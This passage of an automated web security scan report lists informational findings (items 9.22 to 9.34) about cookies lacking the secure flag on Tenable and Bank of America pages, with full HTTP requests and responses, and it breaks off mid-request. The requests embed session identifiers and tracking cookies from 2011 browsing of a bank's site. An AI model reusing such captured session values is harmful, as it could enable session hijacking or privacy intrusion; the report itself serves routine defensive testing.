Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:39 GMT
Server: Apache
Set-Cookie: zenid=7fb8442f26d1db353ad8306c5db292f6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28503

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta
...[SNIP]...

9.22. https://support.tenable.com/support-center/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /support-center/

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support-center/ HTTP/1.1
Host: support.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:49:35 GMT
Server: Apache
Set-Cookie: CerberusPublicGUI=9f3i1skvvnpph1et7uucrkbep2; path=/; domain=support.tenable.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19773

<!doctype html>
<html lang="en">
<head>
   <title>Tenable Customer Support Portal</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8">
<link rel="stylesheet" href="cerbe
...[SNIP]...

9.23. https://tc.bankofamerica.com/c

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /c

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c HTTP/1.1
Host: tc.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:45:45 GMT
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 139
Last-Modified: Tue, 26 Apr 2011 12:45:45 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:45:45 GMT;path=/;domain=bankofamerica.com

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>No siteID in request</P>
   </BODY>
</HTML>

9.24. https://www.bankofamerica.com/Control.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Control.do?body=where_passcode_popup HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:47:04 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000F4yK4l84__JtyAFjxBtSMXQ:12rfueih8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description
...[SNIP]...

9.25. https://www.bankofamerica.com/ProcessUser.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /ProcessUser.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:47 GMT
Content-length: 0
Content-type: text/html
Location: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
Content-language: en-US
Set-cookie: JSESSIONID=0000Lh6TRorO-NKY7teHECejE7Y:12qtmh5cl; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Tue, 03 May 2011 12:23:47 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"


9.26. https://www.bankofamerica.com/deposits/cds-iras.go

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/cds-iras.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/cds-iras.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000WiNAyOMxZusl2j9h3aZNboI:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 53792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.27. https://www.bankofamerica.com/deposits/checking-accounts.go

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/checking-accounts.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/checking-accounts.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:48:28 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000Ns7qzV67h5K_rR84M2jM6vq:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 57115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.28. https://www.bankofamerica.com/deposits/savings-accounts.go

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/savings-accounts.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/savings-accounts.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:44 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000bOFCpk8nTt8aoF-IeAOnvoo:15emvorhf; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 60652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.29. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/special-programs/add-it-up.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/special-programs/add-it-up.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000ti0PA0mGuPOKot4gZ7LWh8g:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 44436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.30. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/special-programs/keep-the-change.go

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deposits/special-programs/keep-the-change.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000TQk9nyNVXhD3M3oMcJ_JRuk:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 48014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...

9.31. https://www.bankofamerica.com/military

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /military

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /military HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:52 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:49:52 GMT
Location: https://www.bankofamerica.com/military/
Connection: close


9.32. https://www.bankofamerica.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy

Issue detail

The following cookies were issued by the application and do not have the secure flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:53 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:49:53 GMT
Location: https://www.bankofamerica.com/privacy/
Connection: close


9.33. https://www.bankofamerica.com/privacy/Control.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/Control.do?body=privacysecur_unauthorised_acc_use HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:49 GMT
Content-length: 0
Location: https://www.bankofamerica.com/privacy/Control.do?body=privacysecur_resolve_fraud
Content-language: en-US
Set-cookie: JSESSIONID=00001VjF6Tcy6jJdOdG1SbWoNG-:12qb4kb6q; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


9.34. https://www.bankofamerica.com/privacy/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
